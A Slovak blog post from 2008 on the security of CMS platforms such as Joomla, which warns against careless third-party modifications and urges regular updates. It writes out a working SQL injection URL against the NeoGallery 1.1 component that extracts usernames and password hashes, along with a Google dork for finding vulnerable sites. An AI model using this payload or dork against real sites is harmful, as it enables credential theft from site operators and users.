Zranitelnosť redakčných systémov (c) PCBlog.sk

  • WallPapers
  • HTML
  • Prevody jednotiek
  • Internet
  • Praca IN

Navigácia

    Posledné články

    • Ako urobiť z linkov v code živé linky (pre Firefox a Operu)
    • Volanie zadarmo cez zlatestranky.sk
    • Zoznam freehostingov so subdomenami
    • Vytvorenie CS 1.6 servera zdarma
    • Free SMS cez internet
    • Spider-Man: Web of Shadows
    • Európski poslanci chcú chrániť deti pred zneužitím na internete
    • Facebook hostuje až desať miliárd fotografií
    • V USA majú nový anti-pirátsky zákon
    • Apple odhalí nové MacBooky 14. októbra

    Odkazy inde

    Pcblog.sk

Zranitelnosť redakčných systémov

Vela ludi si chce vytvorit stranku aj bez znalosti HTML, vecsina siahne po programe a niektory si skusia niekedy jednoduchsiu ale lepsiu variantu redakcny system.

Vela ludi si chce vytvorit stranku aj bez znalosti HTML, vecsina siahne po programe a niektory si skusia niekedy jednoduchsiu ale lepsiu variantu redakcny system.

Redakcny system sa v anglictine oznacuje ako CMS(Content Management System) alebo po slovensky skratkou RS. Je to program naprogramovany vecsinou v PHP cez ktory si jednoducho nastavite vzhlad a funkcnost stranky. Redakcnych systemov je na internete velmi vela niektore su aj platene ale vecsina z nich je open source. Take najznamejsie su napr.: Joomla, PHP-Fusion, phpBB

My sa dnes budeme venovat ich bezpecnosti. Je vseobecne zname ze v open source programoch maju vyvojari vecsiu sancu najst vsetky chyby, ale je tu aj ta horsia stranka, ze si zdrojovy kod moze pozriet hocikto a lahsie najst bezpecnostnu chybu. Samotne RS byvaju dostatocne zabezpecene, vyvojari dokazu takmer okamzite opravit najdenu chybu a vydat aktualizaciu. Horsie je to uz s modifikaciami pre RS ktore moze vytvorit hocijaky nevedomy clovek a neosetrit bezpecnostnu chybu. Najlachsie vyuzitie bezpecnostnej chyby je pomocou exploitu, na stranke http://milw0rm.com ich najdete dost aj pre spominane RS staci si zadat do vyhladavania napr.: Joomla. Ak sa chcete proti takymto exploitom branit tak musite vediet ako funguju, pozrieme sa na jeden konkretny:http://milw0rm.com/exploits/5083

Je to neosetrena SQL injekcia v modifikacii NeoGallery 1.1, autor sa tam samozrejme podpisal je tam jeho mail atd. Nizsie uvidime text DORK 1 : allinurl:"com_neogallery" to znamena ze ak zadate do googlu allinurl:"com_neogallery" tak vam najde nezabepecene stranky(no aha jak na nam google zase pomaha :)). Samotny exploit je toto: index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password), concat(username,0x3a,password), concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users ak tuto poziadavku poslete na server s dotycnou chybou tak vam to pekne vyhodi prihlasovacie udaje, hesla samozrejme sifrovane vecsinou v MD5 hashi ale v dnesnej dobe nieje velky problem ich rozsifrovat.

Ako ste videli tak si treba davat pozor na to ake modifikacie si do svojho RS nahodite, aktualizujte pravidelne RS a nebudete mat problemy s hackermi. Proti exploitom sa neskuseny uzivatel nema ako chranit musi sa jedine spoliehat na vyvojarov. Exploit sa velmi lahko vyuziva takze je velka pravdepodobnost, ze nejaka lama si ten exploit bude chciet vyskusat prave na vasich strankach.

Slovnik: Open source je vo všeobecnosti akákoľvek informácia dostupná verejnosti, za podmienky, že možnosť jej slobodného šírenia zostane zachovaná. V tomto prípade nie je dôležité hovoriť o poplatku za obdržanie, open source znamená slobodu prístupu. Exploit je program na zneuzitie znamej chyby v systeme. MD5 hash je zlozenie cisel a pismen urcene algoritmom bez navratovej hodnoty.

ico God.Hell | ico 17. červenece 08, 12:07

Související články

  • Nejsou žádné podobné články

Iné projekty

czechwebs.cz - Katalóg českých webov
slovakwebs.sk - Katalóg slovenských webov

© 2009 www.PCblog.sk Všetky práva vyhradené. | Prevádzkovateľ: VAVA SK, s.r.o. | Autor : Oldřich Šálek Zásady ochrany osobných údajov